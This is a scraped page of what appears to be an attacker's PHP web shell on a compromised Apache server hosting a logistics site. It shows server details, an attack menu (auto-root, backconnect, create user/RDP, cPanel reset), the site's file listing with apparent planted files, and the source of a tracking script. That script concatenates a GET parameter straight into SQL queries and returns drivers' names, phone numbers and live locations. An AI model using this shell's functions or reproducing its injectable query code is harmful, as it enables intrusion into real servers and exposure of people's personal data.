Linux ip-172-31-29-64 6.8.0-1050-aws #53~22.04.1-Ubuntu SMP Fri Mar 13 21:34:27 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
: 172.31.29.64 | : 216.73.216.137
Cant Read [ /etc/named.conf ]
5.6.40-77+ubuntu22.04.1+deb.sury.org+1
ubuntu
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
maalgaadi /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxrwxr-x
14322
[ DIR ]
drwxrwxr-x
291222
[ DIR ]
drwxrwxr-x
APK
[ DIR ]
drwxrwxr-x
Customer_App
[ DIR ]
drwxrwxr-x
Driver_App
[ DIR ]
drwxrwxr-x
Driver_OnBoarding_App
[ DIR ]
drwxrwxr-x
app
[ DIR ]
drwxrwxr-x
assets
[ DIR ]
drwxrwxr-x
js
[ DIR ]
drwxrwxr-x
page_fragment
[ DIR ]
drwxrwxr-x
ssl
[ DIR ]
drwxrwxr-x
.htaccess
368
B
-rw-rw-r--
Driver_Icon.jpeg
1.2
KB
-rw-rw-r--
GoogleSpreadSheets.php
918
B
-rw-rw-r--
New file
8.11
KB
-rw-rw-r--
_demoNj.php
4.24
KB
-rw-rw-r--
_demo_AK.php
818
B
-rw-rw-r--
_query_run.php
776
B
-rw-rw-r--
api_validate.php
2.36
KB
-rw-rw-r--
attach-vehicle.html
11.27
KB
-rw-rw-r--
blog.html
12.67
KB
-rw-rw-r--
call.png
860
B
-rw-rw-r--
careers.html
15.19
KB
-rw-rw-r--
currentDriverData.php
1.31
KB
-rw-rw-r--
driver_tracking_detail.php
15.8
KB
-rw-rw-r--
events.html
15.58
KB
-rw-rw-r--
gecko.php
172.83
KB
-rw-rw-r--
getData.php
8.52
KB
-rw-rw-r--
google99ae0657ac3e3c1d.html
53
B
-rw-rw-r--
googleb09350006d774800.html
53
B
-rw-rw-r--
ids.php
178
B
-rw-rw-r--
index.php
52.42
KB
-rw-rw-r--
index2.php
50.04
KB
-rw-rw-r--
info.php
27
B
-rw-rw-r--
live_tracking.php
17.36
KB
-rw-rw-r--
marker-track.png
1.26
KB
-rw-rw-r--
mass.php
133.38
KB
-rw-rw-r--
order-tracking_operation.php
1.82
KB
-rw-rw-r--
privacy-policy.html
18.47
KB
-rw-rw-r--
robots.txt
27
B
-rw-rw-r--
sitemap.xml
670
B
-rw-rw-r--
terms-and-condition.html
55.15
KB
-rw-rw-r--
whatsapp.png
1.71
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : order-tracking_operation.php
<?php require_once './page_fragment/define.php'; include ('./page_fragment/dbConnect.php'); include ('./page_fragment/dbGeneral.php'); include ('./page_fragment/njGeneral.php'); include ('./page_fragment/njFile.php'); include ('./page_fragment/njEncription.php'); $dbConObj = new dbConnect(); $dbComObj = new dbGeneral(); $njGenObj = new njGeneral(); $njFileObj = new njFile(); $njEncryptionObj = new njEncryption(); $conn = $dbConObj->dbConnect(); $allTripsData = $dbComObj->viewData($conn,"booking", "*"," 1 and `id` = '".$_GET['id']."' and current_status = 'on-trip'");//and current_status = 'on-trip' if ($dbComObj->num_rows($allTripsData) > 0) { while($TripsData = $dbComObj->fetch_object($allTripsData)) { $curLoc = $dbComObj->fetch_object($dbComObj->viewData($conn,"driver_regular_data", "*"," 1 and `driver_id` = '".$TripsData->driver_id."'")); $curDriverDetail = $dbComObj->fetch_object($dbComObj->viewData($conn,"drivers", "*"," 1 and `id` = '".$TripsData->driver_id."'")); $BookingLatLngDetail = $dbComObj->fetch_object($dbComObj->viewData($conn,"favorite_location", "*"," 1 and `booking_id` = '".$_GET['id']."'")); //print_r($curLoc); $pickPoints['pick_latitude'] = $BookingLatLngDetail->pickup_lat; $pickPoints['pick_longitude'] = $BookingLatLngDetail->pickup_lng; $pickPoints['drop_latitude'] = $BookingLatLngDetail->drop_lat; $pickPoints['drop_longitude'] = $BookingLatLngDetail->drop_lng; $pickPoints['latitude'] = $curLoc->lat; $pickPoints['longitude'] = $curLoc->lng; $pickPoints['driver_name'] = $curDriverDetail->driver_name; $pickPoints['driver_contact'] = $curDriverDetail->driver_number; $njArray[] = $pickPoints; } } else { $njArray = '0'; } print_r(json_encode($njArray)); ?>
Close